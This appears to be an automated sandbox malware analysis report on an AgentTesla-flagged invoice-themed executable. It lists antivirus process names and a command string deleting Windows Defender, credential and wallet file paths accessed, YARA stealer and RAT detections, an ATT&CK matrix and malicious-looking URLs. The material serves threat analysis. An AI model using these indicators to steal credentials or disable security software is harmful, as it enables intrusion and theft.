Source: MpSigStub.exe, 00000023.00000003.6429156271.0000028BD7766000.00000004.00000001.sdmp	Binary or memory string: nod32kui.exe
Source: MpSigStub.exe, 00000023.00000003.6430060790.0000028BD7CD0000.00000004.00000001.sdmp	Binary or memory string: KPFW32.EXE
Source: MpSigStub.exe, 00000023.00000003.6271903950.0000028BD6A3F000.00000004.00000001.sdmp	Binary or memory string: mcshield.exe
Source: MpSigStub.exe, 00000023.00000003.6269774597.0000028BC3EE4000.00000004.00000001.sdmp	Binary or memory string: icesword.exe
Source: MpSigStub.exe, 00000023.00000003.6296840471.0000028BD7347000.00000004.00000001.sdmp	Binary or memory string: avgui.exe
Source: MpSigStub.exe, 00000023.00000003.6296840471.0000028BD7347000.00000004.00000001.sdmp	Binary or memory string: C:\WINDOWS\123.EXE
Source: MpSigStub.exe, 00000023.00000003.6267325282.0000028BD7515000.00000004.00000001.sdmp	Binary or memory string: \App Paths\360Safe.exe
Source: MpSigStub.exe, 00000023.00000003.6313262116.0000028BD723F000.00000004.00000001.sdmp	Binary or memory string: AVGcmgr.exe
Source: MpSigStub.exe, 00000023.00000003.6429156271.0000028BD7766000.00000004.00000001.sdmp	Binary or memory string: fsav.exe
Source: MpSigStub.exe, 00000023.00000003.6334830370.0000028BD7708000.00000004.00000001.sdmp	Binary or memory string: delc:\programme\"windowsdefender"\msmpeng.exe
Source: MpSigStub.exe, 00000023.00000003.6308028829.0000028BD7156000.00000004.00000001.sdmp	Binary or memory string: MsMpEng.exe
Source: MpSigStub.exe, 00000023.00000003.6267925507.0000028BD6E61000.00000004.00000001.sdmp	Binary or memory string: "\vipre business agent\sbamsvc.exe
Source: MpSigStub.exe, 00000023.00000003.6343684141.0000028BD6D99000.00000004.00000001.sdmp	Binary or memory string: onlinent.exe
Source: MpSigStub.exe, 00000023.00000003.6268576251.0000028BD5F61000.00000004.00000001.sdmp	Binary or memory string: \MsMpEng.exe
Source: MpSigStub.exe, 00000023.00000003.6340606272.0000028BD78F3000.00000004.00000001.sdmp	Binary or memory string: FSAV32.exe
Source: MpSigStub.exe, 00000023.00000003.6343684141.0000028BD6D99000.00000004.00000001.sdmp	Binary or memory string: cmdagent.exe
Source: MpSigStub.exe, 00000023.00000003.6434983405.0000028BD7D95000.00000004.00000001.sdmp	Binary or memory string: avguard.exe
Source: MpSigStub.exe, 00000023.00000003.6343684141.0000028BD6D99000.00000004.00000001.sdmp	Binary or memory string: fpwin.exe
Source: MpSigStub.exe, 00000023.00000003.6437420306.0000028BD7B02000.00000004.00000001.sdmp	Binary or memory string: zlclient.exe
Source: MpSigStub.exe, 00000023.00000003.6430356442.0000028BD7C4C000.00000004.00000001.sdmp	Binary or memory string: avgtray.exe
Source: MpSigStub.exe, 00000023.00000003.6340606272.0000028BD78F3000.00000004.00000001.sdmp	Binary or memory string: McShield.exe
Source: MpSigStub.exe, 00000023.00000003.6278531314.0000028BD61AB000.00000004.00000001.sdmp	Binary or memory string: RImage File Execution Options\MSMPENG.exe
Source: MpSigStub.exe, 00000023.00000003.6340606272.0000028BD78F3000.00000004.00000001.sdmp	Binary or memory string: TmPfw.exe
Source: MpSigStub.exe, 00000023.00000003.6264075284.0000028BD8107000.00000004.00000001.sdmp	Binary or memory string: regedit.com
Source: MpSigStub.exe, 00000023.00000003.6265938697.0000028BD6B47000.00000004.00000001.sdmp	Binary or memory string: KVMonXP.kxp
Source: MpSigStub.exe, 00000023.00000003.6277659200.0000028BD78B0000.00000004.00000001.sdmp	Binary or memory string: procexp.exe
Source: MpSigStub.exe, 00000023.00000003.6316424698.0000028BD7976000.00000004.00000001.sdmp	Binary or memory string: %installlocation%\msmpeng.exe
Source: MpSigStub.exe, 00000023.00000003.6269393407.0000028BC3ECC000.00000004.00000001.sdmp	Binary or memory string: license.rtf.\|!\SavService.exe
Source: MpSigStub.exe, 00000023.00000003.6343684141.0000028BD6D99000.00000004.00000001.sdmp	Binary or memory string: k7tsecurity.exe
Source: MpSigStub.exe, 00000023.00000003.6334830370.0000028BD7708000.00000004.00000001.sdmp	Binary or memory string: /delc:\programme\"windowsdefender"\msmpeng.exe
Source: MpSigStub.exe, 00000023.00000003.6316424698.0000028BD7976000.00000004.00000001.sdmp	Binary or memory string: Mcshield.exe
Source: MpSigStub.exe, 00000023.00000003.6280430921.0000028BD7B02000.00000004.00000001.sdmp	Binary or memory string: regmon.exe

Stealing of Sensitive Information:

Yara detected Snake Keylogger

Show sources

Source: Yara match

File source: Process Memory Space: MpSigStub.exe PID: 7120, type: MEMORYSTR

Yara detected Evrial Stealer

Show sources

Source: Yara match

File source: Process Memory Space: MpSigStub.exe PID: 7120, type: MEMORYSTR

Yara detected Mini RAT

Show sources

Source: Yara match

File source: Process Memory Space: MpSigStub.exe PID: 7120, type: MEMORYSTR

Yara detected Koadic

Show sources

Source: Yara match

File source: Process Memory Space: MpSigStub.exe PID: 7120, type: MEMORYSTR

Yara detected Generic Dropper

Show sources

Source: Yara match	File source: 35.3.MpSigStub.exe.28bd780418a.26.unpack, type: UNPACKEDPE
Source: Yara match	File source: 35.3.MpSigStub.exe.28bd780418a.59.unpack, type: UNPACKEDPE
Source: Yara match	File source: Process Memory Space: MpSigStub.exe PID: 7120, type: MEMORYSTR

Yara detected Vidar stealer

Show sources

Source: Yara match	File source: 00000023.00000003.6430913129.0000028BD7E73000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: MpSigStub.exe PID: 7120, type: MEMORYSTR

Yara detected Predator

Show sources

Source: Yara match

File source: Process Memory Space: MpSigStub.exe PID: 7120, type: MEMORYSTR

Yara detected Mimikatz

Show sources

Source: Yara match

File source: Process Memory Space: MpSigStub.exe PID: 7120, type: MEMORYSTR

Yara detected RevengeRAT

Show sources

Source: Yara match	File source: 00000023.00000003.6428681257.0000028BD5FA3000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: MpSigStub.exe PID: 7120, type: MEMORYSTR

Yara detected LaZagne password dumper

Show sources

Source: Yara match

File source: Process Memory Space: MpSigStub.exe PID: 7120, type: MEMORYSTR

Yara detected Neshta

Show sources

Source: Yara match

File source: Process Memory Space: MpSigStub.exe PID: 7120, type: MEMORYSTR

Yara detected Discord Token Stealer

Show sources

Source: Yara match

File source: Process Memory Space: MpSigStub.exe PID: 7120, type: MEMORYSTR

Yara detected MailPassView

Show sources

Source: Yara match

File source: Process Memory Space: MpSigStub.exe PID: 7120, type: MEMORYSTR

Yara detected Parallax RAT

Show sources

Source: Yara match

File source: Process Memory Space: MpSigStub.exe PID: 7120, type: MEMORYSTR

Yara detected AgentTesla

Show sources

Source: Yara match	File source: 0000000A.00000002.7245837734.000000001E28E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.7244913734.000000001E201000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 420, type: MEMORYSTR

Yara detected Valak

Show sources

Source: Yara match

File source: Process Memory Space: MpSigStub.exe PID: 7120, type: MEMORYSTR

Yara detected Pony

Show sources

Source: Yara match

File source: Process Memory Space: MpSigStub.exe PID: 7120, type: MEMORYSTR

Yara detected Telegram RAT

Show sources

Source: Yara match	File source: 35.3.MpSigStub.exe.28bd778bb0d.13.unpack, type: UNPACKEDPE
Source: Yara match	File source: 35.3.MpSigStub.exe.28bd780418a.26.unpack, type: UNPACKEDPE
Source: Yara match	File source: 35.3.MpSigStub.exe.28bd780418a.59.unpack, type: UNPACKEDPE
Source: Yara match	File source: Process Memory Space: MpSigStub.exe PID: 7120, type: MEMORYSTR

Yara detected Njrat

Show sources

Source: Yara match	File source: 35.3.MpSigStub.exe.28bd778bb0d.13.unpack, type: UNPACKEDPE
Source: Yara match	File source: 35.3.MpSigStub.exe.28bd77beebe.15.unpack, type: UNPACKEDPE
Source: Yara match	File source: 35.3.MpSigStub.exe.28bd77beebe.25.unpack, type: UNPACKEDPE
Source: Yara match	File source: 35.3.MpSigStub.exe.28bd780418a.26.unpack, type: UNPACKEDPE
Source: Yara match	File source: 35.3.MpSigStub.exe.28bd780418a.59.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000023.00000003.6276951583.0000028BD782D000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000023.00000003.6277926837.0000028BD7CD1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: MpSigStub.exe PID: 7120, type: MEMORYSTR

Yara detected Betabot

Show sources

Source: Yara match

File source: Process Memory Space: MpSigStub.exe PID: 7120, type: MEMORYSTR

Yara detected AveMaria stealer

Show sources

Source: Yara match	File source: 00000023.00000003.6436439478.0000028BD6A3D000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: MpSigStub.exe PID: 7120, type: MEMORYSTR

Yara detected Nukesped

Show sources

Source: Yara match

File source: Process Memory Space: MpSigStub.exe PID: 7120, type: MEMORYSTR

Yara detected Codoso Ghost

Show sources

Source: Yara match	File source: 35.3.MpSigStub.exe.28bd780418a.26.unpack, type: UNPACKEDPE
Source: Yara match	File source: 35.3.MpSigStub.exe.28bd7aaa38f.136.unpack, type: UNPACKEDPE
Source: Yara match	File source: 35.3.MpSigStub.exe.28bd780418a.59.unpack, type: UNPACKEDPE
Source: Yara match	File source: Process Memory Space: MpSigStub.exe PID: 7120, type: MEMORYSTR

Yara detected Growtopia

Show sources

Source: Yara match	File source: 00000023.00000003.6290963131.0000028BD73CB000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: MpSigStub.exe PID: 7120, type: MEMORYSTR

Yara detected Dorkbot

Show sources

Source: Yara match

File source: Process Memory Space: MpSigStub.exe PID: 7120, type: MEMORYSTR

Found many strings related to Crypto-Wallets (likely being stolen)

Show sources

Source: MpSigStub.exe, 00000023.00000003.6435347740.0000028BD7C0A000.00000004.00000001.sdmp	String found in binary or memory: \Electrum-LTC\wallets\
Source: MpSigStub.exe, 00000023.00000003.6436439478.0000028BD6A3D000.00000004.00000001.sdmp	String found in binary or memory: \ElectronCash\wallets\
Source: MpSigStub.exe, 00000023.00000003.6435347740.0000028BD7C0A000.00000004.00000001.sdmp	String found in binary or memory: \Exodus\exodus.wallet\
Source: MpSigStub.exe, 00000023.00000003.6321337544.0000028BD6471000.00000004.00000001.sdmp	String found in binary or memory: exodus.exe
Source: MpSigStub.exe, 00000023.00000003.6264485610.0000028BD7D13000.00000004.00000001.sdmp	String found in binary or memory: !#ALFPER:HSTR:MacOS.Ethereum
Source: MpSigStub.exe, 00000023.00000003.6435347740.0000028BD7C0A000.00000004.00000001.sdmp	String found in binary or memory: \Exodus\exodus.wallet\
Source: MpSigStub.exe, 00000023.00000003.6429156271.0000028BD7766000.00000004.00000001.sdmp	String found in binary or memory: keystore
Source: MpSigStub.exe, 00000023.00000003.6435347740.0000028BD7C0A000.00000004.00000001.sdmp	String found in binary or memory: \Electrum-LTC\wallets\

Tries to steal Mail credentials (via file access)

Show sources

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities

Tries to harvest and steal browser information (history, passwords, etc)

Show sources

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Show sources

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions

Tries to harvest and steal ftp login credentials

Show sources

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites\Quick Connect\

Source: Yara match	File source: 35.3.MpSigStub.exe.28bd778bb0d.13.unpack, type: UNPACKEDPE
Source: Yara match	File source: 35.3.MpSigStub.exe.28bd780418a.26.unpack, type: UNPACKEDPE
Source: Yara match	File source: 35.3.MpSigStub.exe.28bd7aaa38f.136.unpack, type: UNPACKEDPE
Source: Yara match	File source: 35.3.MpSigStub.exe.28bd780418a.59.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000023.00000003.6429156271.0000028BD7766000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.7244913734.000000001E201000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 420, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: MpSigStub.exe PID: 7120, type: MEMORYSTR

Remote Access Functionality:

Yara detected Snake Keylogger

Show sources

Source: Yara match

File source: Process Memory Space: MpSigStub.exe PID: 7120, type: MEMORYSTR

Yara detected Evrial Stealer

Show sources

Source: Yara match

File source: Process Memory Space: MpSigStub.exe PID: 7120, type: MEMORYSTR

Yara detected Mini RAT

Show sources

Source: Yara match

File source: Process Memory Space: MpSigStub.exe PID: 7120, type: MEMORYSTR

Yara detected Koadic

Show sources

Source: Yara match

File source: Process Memory Space: MpSigStub.exe PID: 7120, type: MEMORYSTR

Yara detected Hancitor

Show sources

Source: Yara match

File source: Process Memory Space: MpSigStub.exe PID: 7120, type: MEMORYSTR

Yara detected Meterpreter

Show sources

Source: Yara match	File source: 35.3.MpSigStub.exe.28bd7aaa38f.136.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000023.00000003.6428681257.0000028BD5FA3000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: MpSigStub.exe PID: 7120, type: MEMORYSTR

Yara detected Vidar stealer

Show sources

Source: Yara match	File source: 00000023.00000003.6430913129.0000028BD7E73000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: MpSigStub.exe PID: 7120, type: MEMORYSTR

Yara detected Predator

Show sources

Source: Yara match

File source: Process Memory Space: MpSigStub.exe PID: 7120, type: MEMORYSTR

Detected HawkEye Rat

Show sources

Source: MpSigStub.exe, 00000023.00000003.6430913129.0000028BD7E73000.00000004.00000001.sdmp	String found in binary or memory: HawkEye_Keylogger_Keylog_Records_
Source: MpSigStub.exe, 00000023.00000003.6430913129.0000028BD7E73000.00000004.00000001.sdmp	String found in binary or memory: HawkEyeKeylogger
Source: MpSigStub.exe, 00000023.00000003.6430913129.0000028BD7E73000.00000004.00000001.sdmp	String found in binary or memory: HawkEyeKeylogger]

Detected Remcos RAT

Show sources

Source: MpSigStub.exe, 00000023.00000003.6436106917.0000028BD69FC000.00000004.00000001.sdmp

String found in binary or memory: Remcos_Mutex_Inj

Yara detected RevengeRAT

Show sources

Source: Yara match	File source: 00000023.00000003.6428681257.0000028BD5FA3000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: MpSigStub.exe PID: 7120, type: MEMORYSTR

Yara detected Metasploit Payload

Show sources

Source: Yara match	File source: 35.3.MpSigStub.exe.28bd7aaa38f.136.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000023.00000003.6428681257.0000028BD5FA3000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000023.00000003.6439110180.0000028BD7F7A000.00000004.00000001.sdmp, type: MEMORY

Yara detected Discord Token Stealer

Show sources

Source: Yara match

File source: Process Memory Space: MpSigStub.exe PID: 7120, type: MEMORYSTR

Yara detected Parallax RAT

Show sources

Source: Yara match

File source: Process Memory Space: MpSigStub.exe PID: 7120, type: MEMORYSTR

Yara detected AgentTesla

Show sources

Source: Yara match	File source: 0000000A.00000002.7245837734.000000001E28E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.7244913734.000000001E201000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 420, type: MEMORYSTR

Yara detected Valak

Show sources

Source: Yara match

File source: Process Memory Space: MpSigStub.exe PID: 7120, type: MEMORYSTR

Detected Nanocore Rat

Show sources

Source: MpSigStub.exe, 00000023.00000003.6432490535.0000028BD7D54000.00000004.00000001.sdmp

String found in binary or memory: NanoCore.ClientPluginHost

Yara detected NetWire RAT

Show sources

Source: Yara match

File source: Process Memory Space: MpSigStub.exe PID: 7120, type: MEMORYSTR

Yara detected Linux EvilGnome RC5 key

Show sources

Source: Yara match	File source: 00000023.00000003.6428681257.0000028BD5FA3000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: MpSigStub.exe PID: 7120, type: MEMORYSTR

Yara detected Pony

Show sources

Source: Yara match

File source: Process Memory Space: MpSigStub.exe PID: 7120, type: MEMORYSTR

Detected Imminent RAT

Show sources

Source: MpSigStub.exe, 00000023.00000003.6429156271.0000028BD7766000.00000004.00000001.sdmp

String found in binary or memory: *\ClientPlugin\obj\Release\ClientPlugin.pdb

Yara detected Telegram RAT

Show sources

Source: Yara match	File source: 35.3.MpSigStub.exe.28bd778bb0d.13.unpack, type: UNPACKEDPE
Source: Yara match	File source: 35.3.MpSigStub.exe.28bd780418a.26.unpack, type: UNPACKEDPE
Source: Yara match	File source: 35.3.MpSigStub.exe.28bd780418a.59.unpack, type: UNPACKEDPE
Source: Yara match	File source: Process Memory Space: MpSigStub.exe PID: 7120, type: MEMORYSTR

Yara detected Njrat

Show sources

Source: Yara match	File source: 35.3.MpSigStub.exe.28bd778bb0d.13.unpack, type: UNPACKEDPE
Source: Yara match	File source: 35.3.MpSigStub.exe.28bd77beebe.15.unpack, type: UNPACKEDPE
Source: Yara match	File source: 35.3.MpSigStub.exe.28bd77beebe.25.unpack, type: UNPACKEDPE
Source: Yara match	File source: 35.3.MpSigStub.exe.28bd780418a.26.unpack, type: UNPACKEDPE
Source: Yara match	File source: 35.3.MpSigStub.exe.28bd780418a.59.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000023.00000003.6276951583.0000028BD782D000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000023.00000003.6277926837.0000028BD7CD1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: MpSigStub.exe PID: 7120, type: MEMORYSTR

Yara detected Betabot

Show sources

Source: Yara match

File source: Process Memory Space: MpSigStub.exe PID: 7120, type: MEMORYSTR

Yara detected AveMaria stealer

Show sources

Source: Yara match	File source: 00000023.00000003.6436439478.0000028BD6A3D000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: MpSigStub.exe PID: 7120, type: MEMORYSTR

Yara detected Nukesped

Show sources

Source: Yara match

File source: Process Memory Space: MpSigStub.exe PID: 7120, type: MEMORYSTR

Yara detected Codoso Ghost

Show sources

Source: Yara match	File source: 35.3.MpSigStub.exe.28bd780418a.26.unpack, type: UNPACKEDPE
Source: Yara match	File source: 35.3.MpSigStub.exe.28bd7aaa38f.136.unpack, type: UNPACKEDPE
Source: Yara match	File source: 35.3.MpSigStub.exe.28bd780418a.59.unpack, type: UNPACKEDPE
Source: Yara match	File source: Process Memory Space: MpSigStub.exe PID: 7120, type: MEMORYSTR

Yara detected Growtopia

Show sources

Source: Yara match	File source: 00000023.00000003.6290963131.0000028BD73CB000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: MpSigStub.exe PID: 7120, type: MEMORYSTR

Yara detected Dorkbot

Show sources

Source: Yara match

File source: Process Memory Space: MpSigStub.exe PID: 7120, type: MEMORYSTR

Contains VNC / remote desktop functionality (version string found)

Show sources

Source: MpSigStub.exe, 00000023.00000003.6290963131.0000028BD73CB000.00000004.00000001.sdmp

String found in binary or memory: RFB 003.008

Source: Yara match	File source: 00000023.00000003.6315331031.0000028BD6126000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000023.00000003.6328967380.0000028BD6126000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: MpSigStub.exe PID: 7120, type: MEMORYSTR

Source: MpSigStub.exe, 00000023.00000003.6288686675.0000028BD7BA5000.00000004.00000001.sdmp	String found in binary or memory: .php?cmd=login_submit&id=$praga$praga&session=$praga$praganame=chalbhaiid=chalbhaimethod=post>
Source: MpSigStub.exe, 00000023.00000003.6271144612.0000028BD765F000.00000004.00000001.sdmp	String found in binary or memory: cmd=getload&login=
Source: MpSigStub.exe, 00000023.00000003.6338781268.0000028BD70B3000.00000004.00000001.sdmp	String found in binary or memory: ?cmd=getload&

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Replication Through Removable Media1	Windows Management Instrumentation211	DLL Side-Loading1	DLL Side-Loading1	Disable or Modify Tools11	OS Credential Dumping3	System Time Discovery1	Remote Desktop Protocol1	Archive Collected Data11	Exfiltration Over Other Network Medium	Ingress Tool Transfer1	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Data Encrypted for Impact2
Default Accounts	Command and Scripting Interpreter1	Boot or Logon Initialization Scripts	Process Injection112	Obfuscated Files or Information1	Credential API Hooking1	Peripheral Device Discovery1	Replication Through Removable Media1	Data from Local System3	Exfiltration Over Bluetooth	Encrypted Channel21	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	Software Packing2	Input Capture21	File and Directory Discovery2	SMB/Windows Admin Shares	Email Collection1	Automated Exfiltration	Non-Standard Port1	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	DLL Side-Loading1	Credentials in Registry1	System Information Discovery116	Distributed Component Object Model	Credential API Hooking1	Scheduled Transfer	Remote Access Software6	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	File Deletion11	LSA Secrets	Query Registry1	SSH	Input Capture21	Data Transfer Size Limits	Non-Application Layer Protocol2	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	Masquerading31	Cached Domain Credentials	Security Software Discovery441	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Application Layer Protocol123	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	Virtualization/Sandbox Evasion351	DCSync	Process Discovery2	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Proxy1	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	Process Injection112	Proc Filesystem	Virtualization/Sandbox Evasion351	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue
Exploit Public-Facing Application	PowerShell	At (Linux)	At (Linux)	Hidden Users1	/etc/passwd and /etc/shadow	Application Window Discovery1	Software Deployment Tools	Data Staged	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	Web Protocols	Rogue Cellular Base Station		Data Destruction

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
FAKTURA I PARAGONY.exe	45%	Virustotal		Browse
FAKTURA I PARAGONY.exe	27%	ReversingLabs	Win32.Trojan.AgentTesla

Dropped Files

Source	Detection	Scanner	Link
C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\5F092BAC-4701-4818-8EB0-1B8D5E2340F4\MpSigStub.exe	0%	Metadefender	Browse
C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\5F092BAC-4701-4818-8EB0-1B8D5E2340F4\MpSigStub.exe	0%	ReversingLabs
C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\5F092BAC-4701-4818-8EB0-1B8D5E2340F4\mpasbase.vdm	0%	ReversingLabs
C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\5F092BAC-4701-4818-8EB0-1B8D5E2340F4\mpasdlta.vdm	0%	ReversingLabs
C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\5F092BAC-4701-4818-8EB0-1B8D5E2340F4\mpavbase.vdm	0%	ReversingLabs
C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\5F092BAC-4701-4818-8EB0-1B8D5E2340F4\mpavdlta.vdm	0%	ReversingLabs

Unpacked PE Files

Source	Detection	Scanner	Label	Download
35.3.MpSigStub.exe.28bd68763ba.143.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
35.3.MpSigStub.exe.28bd62ff37e.139.unpack	100%	Avira	TR/Crypt.ZPACK.Gen	Download File
35.3.MpSigStub.exe.28bd62c32d4.74.unpack	100%	Avira	TR/Crypt.ZPACK.Gen	Download File
35.3.MpSigStub.exe.28bd7aaa38f.136.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
35.3.MpSigStub.exe.28bd778bb0d.13.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
35.3.MpSigStub.exe.28bd62c32d4.170.unpack	100%	Avira	TR/Crypt.ZPACK.Gen	Download File
35.3.MpSigStub.exe.28bd76c8116.47.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
35.3.MpSigStub.exe.28bd62c283a.76.unpack	100%	Avira	TR/Crypt.ZPACK.Gen	Download File
35.3.MpSigStub.exe.28bd7098dc6.214.unpack	100%	Avira	TR/Crypt.ZPACK.Gen	Download File
35.3.MpSigStub.exe.28bd7098dc6.98.unpack	100%	Avira	TR/Crypt.ZPACK.Gen	Download File
35.3.MpSigStub.exe.28bd6697177.158.unpack	100%	Avira	TR/Crypt.ZPACK.Gen	Download File
35.3.MpSigStub.exe.28bd76c8116.30.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
35.3.MpSigStub.exe.28bd7098dc6.64.unpack	100%	Avira	TR/Crypt.ZPACK.Gen	Download File
35.3.MpSigStub.exe.28bd62c283a.171.unpack	100%	Avira	TR/Crypt.ZPACK.Gen	Download File
35.3.MpSigStub.exe.28bd7850ae6.50.unpack	100%	Avira	TR/Patched.Ren.Gen	Download File
35.3.MpSigStub.exe.28bd780418a.59.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
35.3.MpSigStub.exe.28bd62c2d87.75.unpack	100%	Avira	TR/Crypt.ZPACK.Gen	Download File
35.3.MpSigStub.exe.28bd780418a.26.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
35.3.MpSigStub.exe.28bd6694af5.157.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
35.3.MpSigStub.exe.28bd62c2d87.172.unpack	100%	Avira	TR/Crypt.ZPACK.Gen	Download File
35.3.MpSigStub.exe.28bd77beebe.15.unpack	100%	Avira	TR/Crypt.ZPACK.Gen	Download File
35.3.MpSigStub.exe.28bd76c8116.178.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
35.3.MpSigStub.exe.28bd77beebe.25.unpack	100%	Avira	TR/Crypt.ZPACK.Gen	Download File

Domains

Source	Detection	Scanner	Link
tccinfaes.com	3%	Virustotal	Browse
mail.tccinfaes.com	11%	Virustotal	Browse
x1.i.lencr.org	0%	Virustotal	Browse

URLs

Source	Detection	Scanner	Label	Link
http://kiranacorp.com/oja	1%	Virustotal		Browse
http://kiranacorp.com/oja	0%	Avira URL Cloud	safe
http://www.bonusesfound.ml/update/index.php	0%	Avira URL Cloud	safe
http://www.cooctdlfast.com/download.php?	0%	Avira URL Cloud	safe
http://110.42.4.180:	0%	Avira URL Cloud	safe
http://stmichaelolivewood.com/templates/landofchrist/css/msg.jpg	0%	Avira URL Cloud	safe
http://minetopsforums.ru/new_link3.php?site=	0%	Avira URL Cloud	safe
http://today-friday.cn/maran/sejvan/get.php	0%	Avira URL Cloud	safe
http://Yyl.mofish.cn/interface/SeedInstall.aspx	0%	Avira URL Cloud	safe
http://ati.vn	0%	Avira URL Cloud	safe
http://errors.statsmyapp.comxa	0%	Avira URL Cloud	safe
http://www.chambersign.org1	0%	Avira URL Cloud	safe
http://tempuri.org/	0%	Avira URL Cloud	safe
http://185.172.110.217/robx/remit.jpg	0%	Avira URL Cloud	safe
https://anonfiles.com/	0%	Avira URL Cloud	safe
http://www.whitehouseknutsford.co.uk/invoice-status/please-pull-invoice-684594/	0%	Avira URL Cloud	safe
https://sumnermail.org/sumnerscools/school.php	0%	Avira URL Cloud	safe
http://139.162.	0%	Avira URL Cloud	safe
